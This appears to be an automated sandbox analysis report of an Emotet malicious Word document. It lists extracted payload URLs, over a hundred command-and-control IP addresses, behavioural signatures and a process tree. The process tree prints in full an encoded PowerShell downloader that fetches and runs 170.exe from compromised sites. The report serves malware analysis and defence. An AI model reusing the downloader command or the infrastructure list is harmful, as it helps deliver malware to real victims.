Analysis
-
max time kernel
29s -
resource
win10v191014 -
submitted
30-01-2020 21:34
General
Malware Config
Extracted
http://anivfx.kr/wp-snapshots/vsGnmTxC/
http://unoparjab.com.br/wp-content/themes/twentysixteen/shqjYS/
http://5designradioa.com/cgi-bin/hel3pgfj0u-utw9ye5h-00601/
http://agencia619.online/cli/nntYnR/
http://africa2h.org/wp-content/brxhQk/
Extracted
emotet
68.183.18.169:8080
178.62.75.204:8080
192.241.220.183:8080
177.103.240.93:80
196.6.119.137:80
203.124.57.50:80
195.250.143.182:80
95.66.182.136:80
78.189.60.109:443
98.192.74.164:80
50.116.78.109:8080
88.247.26.78:80
51.38.134.203:8080
37.70.131.107:80
186.10.92.114:80
105.209.235.113:8080
80.211.32.88:8080
75.86.6.174:80
192.210.217.94:8080
58.185.224.18:80
61.204.119.188:443
58.92.179.55:443
60.151.66.216:443
82.145.43.153:8080
61.221.152.140:80
211.20.154.102:80
77.74.78.80:443
162.144.46.90:8080
78.186.102.195:80
42.51.192.231:8080
78.46.87.133:8080
85.109.190.235:443
185.192.75.240:443
98.178.241.106:80
91.117.131.122:80
60.152.212.149:80
175.127.140.68:80
162.154.175.215:80
190.171.153.139:80
203.153.216.178:7080
180.33.71.88:80
190.5.162.204:80
212.112.113.235:80
192.241.241.221:443
110.2.118.164:80
144.76.56.36:8080
91.83.93.103:443
88.248.140.80:80
78.189.165.52:8080
163.172.107.70:8080
95.130.37.244:443
82.165.15.188:8080
156.155.163.232:80
24.141.12.228:80
72.176.87.136:80
88.247.53.159:443
75.127.14.170:8080
46.32.229.152:8080
91.117.31.181:80
82.146.55.23:7080
186.84.173.136:8080
187.177.155.123:990
216.75.37.196:8080
217.12.70.226:80
195.201.56.70:8080
201.183.251.100:80
182.74.249.74:80
70.45.30.28:80
183.87.40.21:8080
78.188.170.128:80
160.226.171.255:443
109.236.109.159:8080
160.119.153.20:80
78.210.132.35:80
210.213.85.43:8080
59.135.126.129:443
85.100.122.211:80
1.217.126.11:443
182.187.137.199:8080
142.93.87.198:8080
188.251.213.180:443
81.82.247.216:80
183.82.123.60:443
178.33.167.120:8080
175.181.7.188:80
186.223.86.136:443
186.147.245.204:80
89.215.225.15:80
46.17.6.116:8080
184.162.115.11:443
186.10.98.177:80
190.93.210.113:80
181.196.27.123:80
37.46.129.215:8080
190.63.7.166:8080
5.196.200.208:8080
81.214.142.115:80
190.17.94.108:443
95.216.207.86:7080
41.215.79.182:80
144.139.91.187:80
182.176.116.139:995
37.211.67.229:80
200.82.88.254:80
177.144.130.105:443
70.60.238.62:80
187.72.47.161:443
125.209.114.180:443
172.104.70.207:8080
149.202.153.251:8080
58.93.151.148:80
139.59.12.63:8080
23.253.207.142:8080
72.27.212.209:8080
88.225.230.33:80
98.15.140.226:80
157.7.164.178:8081
179.5.118.12:8080
82.79.244.92:80
212.129.14.27:8080
150.246.246.238:80
110.142.161.90:80
60.130.173.117:80
185.244.167.25:443
112.186.195.176:80
176.58.93.123:80
41.77.74.214:443
Signatures
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 4984 WINWORD.EXE -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 4984 WINWORD.EXE 4764 170.exe 3960 170.exe -
Process spawned unexpected child process 1 IoCs
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3848 456 PoWERsheLL.exe 74 -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3848 PoWERsheLL.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 3848 PoWERsheLL.exe -
Suspicious behavior: EmotetMutantsSpam 1 IoCs
pid Process 3960 170.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE -
Executes dropped EXE 2 IoCs
pid Process 4764 170.exe 3960 170.exe -
Suspicious use of WriteProcessMemory 1 IoCs
description pid Process procid_target PID 4764 wrote to memory of 3960 4764 170.exe 81 -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\0bc8fbdffdd026661700a901a68d6cff4cea5837c35fb1cab2d524f89eb8f0c8.doc" /o ""1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Checks processor information in registry
- Enumerates system info in registry
PID:4984
-
C:\Windows\System32\WindowsPowerShell\v1.0\PoWERsheLL.exePoWERsheLL -e JABXAGUAaABnAGwAbgB1AHUAZQB5AD0AJwBDAHMAcgBxAGgAYwBnAHYAdwAnADsAJABNAGQAdwBrAHgAdAB1AGsAYQBhAHMAaQBlACAAPQAgACcAMQA3ADAAJwA7ACQAWQBnAGkAegBoAHgAcgB0AHoAaAByAG4AcgA9ACcASQByAGkAcwBsAGsAbgBzAHIAaQBrAGsAJwA7ACQAUQBhAHkAcAByAG4AcwB5AHYAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAE0AZAB3AGsAeAB0AHUAawBhAGEAcwBpAGUAKwAnAC4AZQB4AGUAJwA7ACQAVQBuAHIAdABpAGkAZQBlAHYAbQBnAGcAdAA9ACcAQQBkAHoAcwBoAHgAZABuAGwAegBuAGsAJwA7ACQASgBvAG8AcABqAG8AdQBzAGcAeQA9AC4AKAAnAG4AZQB3ACcAKwAnAC0AbwBiAGoAZQAnACsAJwBjACcAKwAnAHQAJwApACAATgBFAFQALgB3AEUAQgBjAGwASQBlAG4AVAA7ACQAQQBkAHkAbgBmAHUAYwB1AHoAbAB2AHQAZgA9ACcAaAB0AHQAcAA6AC8ALwBhAG4AaQB2AGYAeAAuAGsAcgAvAHcAcAAtAHMAbgBhAHAAcwBoAG8AdABzAC8AdgBzAEcAbgBtAFQAeABDAC8AKgBoAHQAdABwADoALwAvAHUAbgBvAHAAYQByAGoAYQBiAC4AYwBvAG0ALgBiAHIALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AdABoAGUAbQBlAHMALwB0AHcAZQBuAHQAeQBzAGkAeAB0AGUAZQBuAC8AcwBoAHEAagBZAFMALwAqAGgAdAB0AHAAOgAvAC8ANQBkAGUAcwBpAGcAbgByAGEAZABpAG8AYQAuAGMAbwBtAC8AYwBnAGkALQBiAGkAbgAvAGgAZQBsADMAcABnAGYAagAwAHUALQB1AHQAdwA5AHkAZQA1AGgALQAwADAANgAwADEALwAqAGgAdAB0AHAAOgAvAC8AYQBnAGUAbgBjAGkAYQA2ADEAOQAuAG8AbgBsAGkAbgBlAC8AYwBsAGkALwBuAG4AdABZAG4AUgAvACoAaAB0AHQAcAA6AC8ALwBhAGYAcgBpAGMAYQAyAGgALgBvAHIAZwAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBiAHIAeABoAFEAawAvACcALgAiAHMAcABsAGAAaQBUACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQAUgB4AG0AbAB2AGUAdQB6AHUAaQBnAD0AJwBXAHcAbQBmAHEAaAB4AHEAJwA7AGYAbwByAGUAYQBjAGgAKAAkAEMAagBiAGkAYQBiAHYAdwByAGIAcwAgAGkAbgAgACQAQQBkAHkAbgBmAHUAYwB1AHoAbAB2AHQAZgApAHsAdAByAHkAewAkAEoAbwBvAHAAagBvAHUAcwBnAHkALgAiAGQAbwBgAFcATgBsAE8AYQBEAGAARgBJAGwARQAiACgAJABDAGoAYgBpAGEAYgB2AHcAcgBiAHMALAAgACQAUQBhAHkAcAByAG4AcwB5AHYAKQA7ACQAUwB6AGIAcQB6AGcAdAB1AHgAcQA9ACcATwB0AHYAeQBiAGEAYgBqACcAOwBJAGYAIAAoACgALgAoACcARwBlACcAKwAnAHQALQBJACcAKwAnAHQAZQBtACcAKQAgACQAUQBhAHkAcAByAG4AcwB5AHYAKQAuACIAbABlAG4AYABHAHQASAAiACAALQBnAGUAIAAzADIAOQA1ADIAKQAgAHsAKABbAHcAbQBpAGMAbABhAHMAcwBdACcAdwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcwAnACkALgAiAGMAYABSAGUAYQBgAFQARQAiACgAJABRAGEAeQBwAHIAbgBzAHkAdgApADsAJABUAGgAcgB6AHUAeABjAHIAegBtAG0APQAnAFUAbwB2AHQAYgBuAGkAYQBwAHMAJwA7AGIAcgBlAGEAawA7ACQASgBzAGcAeABwAHYAdQBmAGkAaABqAGkAPQAnAFgAdgB5AG8AcgBjAHkAaQBlAG0AZQBoAGgAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAUQBlAG8AagBnAGsAZQB2AD0AJwBSAHMAbwBlAG0AZQBtAG0AYwBwACcA1⤵
- Process spawned unexpected child process
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:3848
-
C:\Users\Admin\170.exeC:\Users\Admin\170.exe1⤵
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4764 -
C:\Users\Admin\170.exe--89c7e6c82⤵
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: EmotetMutantsSpam
- Executes dropped EXE
PID:3960
-